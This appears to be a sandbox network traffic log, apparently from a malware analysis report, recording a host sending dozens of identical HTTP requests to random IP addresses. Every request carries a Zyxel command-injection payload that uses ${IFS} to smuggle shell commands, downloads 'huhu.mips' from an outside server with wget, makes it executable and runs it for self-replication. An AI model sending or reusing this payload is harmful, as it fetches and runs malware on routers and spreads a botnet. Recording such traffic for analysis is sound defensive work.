                                                        Feb 2, 2024 06:21:09.926820040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4415192.168.2.1447760219.116.133.240443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926861048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4416192.168.2.1449460185.202.117.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926908970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4417192.168.2.144983870.83.245.209443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926939011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4418192.168.2.144562448.246.63.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.926976919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4419192.168.2.1449918169.71.183.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927021027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4420192.168.2.143468219.197.63.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927057981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4421192.168.2.1437614103.229.144.55443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927112103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4422192.168.2.143989648.87.214.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927158117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4423192.168.2.143759093.59.160.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927192926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4424192.168.2.1451148167.118.193.22443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927263021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4425192.168.2.145834480.71.104.253443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927299976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4426192.168.2.1433956180.143.6.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927340031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4427192.168.2.144404225.81.193.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927390099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4428192.168.2.1443024154.10.157.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927440882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4429192.168.2.1442630132.11.122.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927486897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4430192.168.2.1440732125.92.140.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927530050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4431192.168.2.143447286.80.85.224443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927578926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4432192.168.2.14526421.16.123.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927602053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4433192.168.2.1455426147.203.182.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927645922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4434192.168.2.1438042201.101.246.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927699089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4435192.168.2.144653857.18.134.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927730083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4436192.168.2.1444750155.122.36.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927761078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4437192.168.2.1438066116.40.18.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927812099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4438192.168.2.1450906196.57.93.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927833080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4439192.168.2.1458734219.242.80.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927882910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4440192.168.2.1446608147.171.254.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927928925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4441192.168.2.1454478104.82.190.242443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.927978039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4442192.168.2.145183259.81.104.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928009033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4443192.168.2.146055445.235.131.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928066015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4444192.168.2.1448236132.41.130.91443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928100109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4445192.168.2.1443100114.119.62.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928152084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4446192.168.2.1438818105.97.121.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928186893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4447192.168.2.143297014.84.147.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928219080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4448192.168.2.144745884.78.212.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928251982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4449192.168.2.1447932178.214.244.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928282976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4450192.168.2.143582657.105.211.148443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928316116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4451192.168.2.145466065.14.106.46443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928352118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4452192.168.2.144397694.230.151.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928400040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4453192.168.2.1435078216.158.87.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928419113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4454192.168.2.1453672210.218.233.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928464890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4455192.168.2.1456840114.84.206.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928504944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4456192.168.2.144977627.64.156.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928555965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4457192.168.2.1458616146.133.158.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928611040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4458192.168.2.144721062.165.192.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928648949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4459192.168.2.145072443.80.147.255443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928683996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4460192.168.2.14544304.172.150.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928739071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4461192.168.2.1437604166.86.254.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928766012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4462192.168.2.1456428100.198.255.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928798914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4463192.168.2.1448774126.20.184.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928854942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4464192.168.2.1433298199.144.103.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928895950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4465192.168.2.1433374203.209.128.78443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928945065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4466192.168.2.145562250.90.210.247443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.928968906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4467192.168.2.144918673.103.159.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929006100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4468192.168.2.143877620.52.7.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929063082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4469192.168.2.1439372158.25.149.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929085016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4470192.168.2.1437452164.113.214.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929136038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4471192.168.2.144155657.113.152.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929164886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4472192.168.2.144534483.82.81.198443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929202080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4473192.168.2.143543814.46.12.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929229975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4474192.168.2.1435720133.46.231.49443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929282904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4475192.168.2.1451854134.246.41.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929335117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4476192.168.2.1458392168.40.176.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:09.929382086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4477192.168.2.144333474.136.74.182443
                                                        TimestampBytes transferredDirectionData
